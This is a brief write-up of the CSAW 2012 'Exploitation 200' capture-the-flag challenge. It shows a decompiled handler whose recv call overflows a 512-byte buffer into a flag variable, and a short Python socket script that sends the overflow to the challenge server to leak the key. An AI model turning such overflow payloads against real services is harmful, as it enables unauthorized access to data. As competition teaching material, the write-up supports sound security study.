CSAW 2012 – Exploitation 200
$ md5sum exp200 979fd4900ef48a1b958d6d555c4c35b5 exp200
$ file exp200 exp200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x94e984380a61d713c1a614f40eeee92c533593d4, not stripped
Opening the binary in IDA reveals a vulnerable function:
int __cdecl handle(int fd) { char buf[512]; // [sp+1Ch] [bp-20Ch]@1 int v3; // [sp+21Ch] [bp-Ch]@1 v3 = 0; memset(buf, 0, sizeof(buf)); send(fd, "Wecome to my first CS project.\nPlease type your name: ", 0x37u, 0); recv(fd, buf, 516u, 0); buf[511] = 0; if ( !strcmp(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") ) v3 = 1; if ( v3 ) { ::fd = (int)fopen("./key", "r"); __isoc99_fscanf(::fd, "%s", buf); recv(fd, 0, 0x10u, 64); // flags=DONT_WAIT send(fd, buf, 0x200u, 0); } return close(fd); }
One can choose to send “AAAAAAAAAAAAAAAAAAAAAAAAAA\n” to the server and get the key.
Or do it the hard way and overflow buf and consequently variable v1. 🙂
import socket service_port = 54321 ip = "128.238.66.218" s = socket.create_connection((ip, service_port)) buf = 'B' * 512 + '\x01\x00\x00\x00' print s.recv(4096) s.send(buf) print s.recv(4096)
Leave a comment